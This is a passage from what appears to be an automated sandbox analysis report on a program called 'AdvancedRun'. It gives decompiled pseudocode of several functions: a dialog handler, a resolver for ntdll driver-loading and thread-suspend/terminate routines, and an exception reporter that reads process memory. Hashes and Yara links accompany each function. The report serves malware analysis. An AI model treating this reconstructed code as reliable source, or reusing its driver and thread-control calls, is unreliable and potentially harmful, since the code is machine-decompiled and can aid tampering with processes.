                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                          			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                                                                                                                          0x00401093
                                                                                                                                                                                                                          0x00401096
                                                                                                                                                                                                                          0x00401097
                                                                                                                                                                                                                          0x0040109b
                                                                                                                                                                                                                          0x004010a3
                                                                                                                                                                                                                          0x004010a5
                                                                                                                                                                                                                          0x00401270
                                                                                                                                                                                                                          0x00401278
                                                                                                                                                                                                                          0x004012b3
                                                                                                                                                                                                                          0x0040127a
                                                                                                                                                                                                                          0x00401293
                                                                                                                                                                                                                          0x004012a2
                                                                                                                                                                                                                          0x004012a2
                                                                                                                                                                                                                          0x004012c1
                                                                                                                                                                                                                          0x004012d9
                                                                                                                                                                                                                          0x004012ea
                                                                                                                                                                                                                          0x004012ec
                                                                                                                                                                                                                          0x004012f6
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004010ab
                                                                                                                                                                                                                          0x004010ab
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401231
                                                                                                                                                                                                                          0x00401236
                                                                                                                                                                                                                          0x00401239
                                                                                                                                                                                                                          0x0040123d
                                                                                                                                                                                                                          0x00401249
                                                                                                                                                                                                                          0x00401249
                                                                                                                                                                                                                          0x0040124c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401252
                                                                                                                                                                                                                          0x00401259
                                                                                                                                                                                                                          0x00401265
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401265
                                                                                                                                                                                                                          0x0040123f
                                                                                                                                                                                                                          0x0040123f
                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401243
                                                                                                                                                                                                                          0x004010b2
                                                                                                                                                                                                                          0x004010b2
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004011e1
                                                                                                                                                                                                                          0x004011e3
                                                                                                                                                                                                                          0x004011e6
                                                                                                                                                                                                                          0x0040120e
                                                                                                                                                                                                                          0x00401216
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040121c
                                                                                                                                                                                                                          0x00401224
                                                                                                                                                                                                                          0x00401226
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040122f
                                                                                                                                                                                                                          0x00401229
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011e8
                                                                                                                                                                                                                          0x004011ed
                                                                                                                                                                                                                          0x004011fb
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x00401203
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010bb
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x00401151
                                                                                                                                                                                                                          0x0040115a
                                                                                                                                                                                                                          0x00401168
                                                                                                                                                                                                                          0x0040116b
                                                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                                                          0x00401170
                                                                                                                                                                                                                          0x00401173
                                                                                                                                                                                                                          0x00401180
                                                                                                                                                                                                                          0x00401182
                                                                                                                                                                                                                          0x00401185
                                                                                                                                                                                                                          0x004011a4
                                                                                                                                                                                                                          0x004011ac
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011b2
                                                                                                                                                                                                                          0x004011ba
                                                                                                                                                                                                                          0x004011bc
                                                                                                                                                                                                                          0x004011c7
                                                                                                                                                                                                                          0x004011c9
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004011d1
                                                                                                                                                                                                                          0x004011cb
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401187
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00401199
                                                                                                                                                                                                                          0x004010c6
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004012fd
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010ce
                                                                                                                                                                                                                          0x004010d7
                                                                                                                                                                                                                          0x004010e5
                                                                                                                                                                                                                          0x004010e8
                                                                                                                                                                                                                          0x004010eb
                                                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                                                          0x004010f0
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x0040111d
                                                                                                                                                                                                                          0x00401125
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040112b
                                                                                                                                                                                                                          0x00401133
                                                                                                                                                                                                                          0x00401135
                                                                                                                                                                                                                          0x00401140
                                                                                                                                                                                                                          0x00401142
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040114a
                                                                                                                                                                                                                          0x00401144
                                                                                                                                                                                                                          0x00401104
                                                                                                                                                                                                                          0x0040110a
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110b
                                                                                                                                                                                                                          0x0040110e
                                                                                                                                                                                                                          0x00401115
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401117
                                                                                                                                                                                                                          0x00401102
                                                                                                                                                                                                                          0x004010c8
                                                                                                                                                                                                                          0x004010c0
                                                                                                                                                                                                                          0x004010b5
                                                                                                                                                                                                                          0x004010ac
                                                                                                                                                                                                                          0x00401303

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                          • String ID: AdvancedRun
                                                                                                                                                                                                                          • API String ID: 829165378-481304740
                                                                                                                                                                                                                          • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                                                                                          0x00408e38
                                                                                                                                                                                                                          0x00408e44
                                                                                                                                                                                                                          0x00408e56
                                                                                                                                                                                                                          0x00408e68
                                                                                                                                                                                                                          0x00408e7a
                                                                                                                                                                                                                          0x00408e8c
                                                                                                                                                                                                                          0x00408e9e
                                                                                                                                                                                                                          0x00408eb0
                                                                                                                                                                                                                          0x00408ec2
                                                                                                                                                                                                                          0x00408ed4
                                                                                                                                                                                                                          0x00408ee6
                                                                                                                                                                                                                          0x00408ef8
                                                                                                                                                                                                                          0x00408f0a
                                                                                                                                                                                                                          0x00408f1c
                                                                                                                                                                                                                          0x00408f21
                                                                                                                                                                                                                          0x00408f23
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408f28
                                                                                                                                                                                                                          0x00408f29

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 667068680-4280973841
                                                                                                                                                                                                                          • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                                          			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                                                                                                                          0x00408ae3
                                                                                                                                                                                                                          0x00408aeb
                                                                                                                                                                                                                          0x00408af3
                                                                                                                                                                                                                          0x00408b76
                                                                                                                                                                                                                          0x00408b8a
                                                                                                                                                                                                                          0x00408b91
                                                                                                                                                                                                                          0x00408b98
                                                                                                                                                                                                                          0x00408bb1
                                                                                                                                                                                                                          0x00408bb3
                                                                                                                                                                                                                          0x00408bc6
                                                                                                                                                                                                                          0x00408bcc
                                                                                                                                                                                                                          0x00408bda
                                                                                                                                                                                                                          0x00408be0
                                                                                                                                                                                                                          0x00408bf3
                                                                                                                                                                                                                          0x00408bfa
                                                                                                                                                                                                                          0x00408c0b
                                                                                                                                                                                                                          0x00408c12
                                                                                                                                                                                                                          0x00408c17
                                                                                                                                                                                                                          0x00408c1a
                                                                                                                                                                                                                          0x00408c2c
                                                                                                                                                                                                                          0x00408c39
                                                                                                                                                                                                                          0x00408c3d
                                                                                                                                                                                                                          0x00408c3f
                                                                                                                                                                                                                          0x00408c41
                                                                                                                                                                                                                          0x00408c52
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c58
                                                                                                                                                                                                                          0x00408c6f
                                                                                                                                                                                                                          0x00408c71
                                                                                                                                                                                                                          0x00408c73
                                                                                                                                                                                                                          0x00408c83
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c89
                                                                                                                                                                                                                          0x00408c8a
                                                                                                                                                                                                                          0x00408c8f
                                                                                                                                                                                                                          0x00408c91
                                                                                                                                                                                                                          0x00408c9a
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c93
                                                                                                                                                                                                                          0x00408c9f
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408caf
                                                                                                                                                                                                                          0x00408cbc
                                                                                                                                                                                                                          0x00408cc2
                                                                                                                                                                                                                          0x00408cc7
                                                                                                                                                                                                                          0x00408ccd
                                                                                                                                                                                                                          0x00408cd0
                                                                                                                                                                                                                          0x00408cd6
                                                                                                                                                                                                                          0x00408cd7
                                                                                                                                                                                                                          0x00408cd8
                                                                                                                                                                                                                          0x00408cde
                                                                                                                                                                                                                          0x00408ce3
                                                                                                                                                                                                                          0x00408ceb
                                                                                                                                                                                                                          0x00408cfe
                                                                                                                                                                                                                          0x00408d03
                                                                                                                                                                                                                          0x00408d06
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00408d21
                                                                                                                                                                                                                          0x00408d27
                                                                                                                                                                                                                          0x00408d0c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408ca7
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408d28
                                                                                                                                                                                                                          0x00408d2e
                                                                                                                                                                                                                          0x00408d35
                                                                                                                                                                                                                          0x00408d36
                                                                                                                                                                                                                          0x00408d42
                                                                                                                                                                                                                          0x00408d48
                                                                                                                                                                                                                          0x00408d4e
                                                                                                                                                                                                                          0x00408d54
                                                                                                                                                                                                                          0x00408d5a
                                                                                                                                                                                                                          0x00408d60
                                                                                                                                                                                                                          0x00408d66
                                                                                                                                                                                                                          0x00408d6c
                                                                                                                                                                                                                          0x00408d72
                                                                                                                                                                                                                          0x00408d73
                                                                                                                                                                                                                          0x00408d7f
                                                                                                                                                                                                                          0x00408d85
                                                                                                                                                                                                                          0x00408d8a
                                                                                                                                                                                                                          0x00408d8f
                                                                                                                                                                                                                          0x00408d90
                                                                                                                                                                                                                          0x00408da8
                                                                                                                                                                                                                          0x00408db9
                                                                                                                                                                                                                          0x00408dbf
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00408dc5
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408cad
                                                                                                                                                                                                                          0x00408ca5
                                                                                                                                                                                                                          0x00408af6
                                                                                                                                                                                                                          0x00408afc
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b38
                                                                                                                                                                                                                          0x00408b53
                                                                                                                                                                                                                          0x00408b56
                                                                                                                                                                                                                          0x00408b62
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b6a
                                                                                                                                                                                                                          0x00408b2a
                                                                                                                                                                                                                          0x00408b07
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                                                                                                                          • {Unknown}, xrefs: 00408BA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                          • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                          			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
